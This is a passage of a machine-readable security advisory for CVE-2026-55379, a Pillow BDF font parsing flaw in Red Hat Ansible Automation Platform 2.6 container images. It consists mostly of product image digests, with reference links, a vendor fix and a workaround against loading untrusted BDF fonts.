"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-55379"
},
{
"category": "external",
"summary": "RHBZ#2497452",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497452"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-55379",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-55379"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-55379",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55379"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d",
"url": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-45hq-cxwh-f6vc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-45hq-cxwh-f6vc"
}
],
"release_date": "2026-07-06T18:52:11.633000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
},
{
"category": "workaround",
"details": "Do not load BDF font files from untrusted sources. Applications that only process standard image formats (PNG, JPEG, etc.) and do not use BdfFontFile or ImageFont.load() with BDF files are not affected.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
